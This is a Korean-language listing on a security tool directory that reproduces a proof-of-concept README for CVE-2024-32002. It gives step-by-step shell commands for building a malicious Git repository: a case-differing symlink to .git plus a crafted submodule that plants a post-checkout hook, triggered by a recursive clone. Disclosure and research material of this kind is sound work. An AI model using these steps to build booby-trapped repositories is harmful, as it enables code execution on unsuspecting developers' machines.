Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2024-32002-poc-rce — CVE-2024-32002에 대한 개념 증명 익스플로잇으로, 대소문자 구분 없는 파일시스템에서 악의적인 Git 서브모듈을 통해 원격 코드 실행을 시연합니다. | Kitploit
도구/GitHubGitHub/jakob-pennington/cve-2024-32002-poc-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubjakob-pennington/cve-2024-32002-poc-rce

cve-2024-32002-poc-rce

CVE-2024-32002에 대한 개념 증명 익스플로잇으로, 대소문자 구분 없는 파일시스템에서 악의적인 Git 서브모듈을 통해 원격 코드 실행을 시연합니다.

저장소 보기
132년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-32002 RCE POC

CVE-2024-32002의 PoC로, 원격 코드 실행(RCE)을 시연합니다.

관련 서브모듈 저장소는 cve-2024-32002-poc-rce에서 확인하세요.

이 저장소에 포함된 내용

  • .git 디렉터리를 가리키는 임의의 이름을 가진 심볼릭 링크.
  • 악성 서브모듈을 정의하는 .gitmodules 파일.

이 저장소를 재현하는 방법

이 저장소는 Linux(WSL2, 정확히는)에서 생성되었습니다. 악성 저장소는 대소문자 구분 파일 시스템에서만 생성할 수 있다는 점이 중요합니다.

  1. 모두 소문자로 심볼릭 링크를 생성합니다.
root@kitploit:~
ln -s .git submodule

참고:

  • 심볼릭 링크는 .git 폴더를 가리켜야 합니다. 파일을 쓰고자 하는 대상이기 때문입니다.
  • 심볼릭 링크 이름(submodule)은 임의지만, 소문자로 시작해야 합니다.
  • 소문자가 대문자보다 정렬 순서상 앞서기 때문에 중요합니다. 클론하는 시스템이 서브모듈 파일을 어디에 써야 할지 혼란스러울 때, 심볼릭 링크를 선택하게 하고 일반 디렉터리를 선택하지 않도록 하기 위함입니다.
  1. 악성 서브모듈을 추가합니다. 서브모듈 디렉터리 이름의 대소문자 차이에 유의하세요.
root@kitploit:~
git submodule add --name rce/notexists https://github.com/JakobTheDev/cve-2024-32002-submodule-rce.git Submodule/modules/rce

참고:

  • 서브모듈 이름("rce/notexists")이 중요합니다. 이는 서브모듈에 훅을 배치할 때 사용됩니다.
    • "rce"는 서브모듈 경로의 마지막 세그먼트와 일치해야 합니다.
    • "notexists"는 서브모듈 디렉터리 내의 hooks/post-checkout을 포함하는 디렉터리 이름과 일치해야 합니다. cve-2024-32002-poc-rce를 참조하세요.
  • 서브모듈 경로("Submodule/modules/rce") 구조도 중요합니다:
    • 경로의 첫 번째 세그먼트("Submodule")는 위의 심볼릭 링크 이름과 대소문자만 달라야 합니다.
    • 두 번째 세그먼트("modules")는 .git 디렉터리 내에서 서브모듈의 git 상태를 추적하는 경로 이름과 일치합니다.
    • 세 번째 세그먼트("rce")는 위 서브모듈 이름의 첫 번째 세그먼트와 일치해야 합니다.

PoC 실행 방법

이 취약점은 Windows와 macOS에만 영향을 미칩니다. 두 운영체제 모두 대소문자 구분이 없는 파일 시스템을 사용하기 때문입니다.

  1. 취약한 버전의 git을 사용 중인지 확인하세요. 영향을 받는 버전은 GitHub 권고를 참조하십시오.
root@kitploit:~
git --version
  1. 의도적으로 RCE를 달성할 수 있는 명령을 실행하려는 것인지 생각해보세요... 이 저장소는 무해하지만, 확실한가요?
  2. 다음 명령을 실행하세요:
root@kitploit:~
git clone --recursive --config core.symlinks=true https://github.com/JakobTheDev/cve-2024-32002-poc-rce.git
  1. PoC가 성공했다면, 계산을 해볼 수 있을 것입니다!
도구 다운로드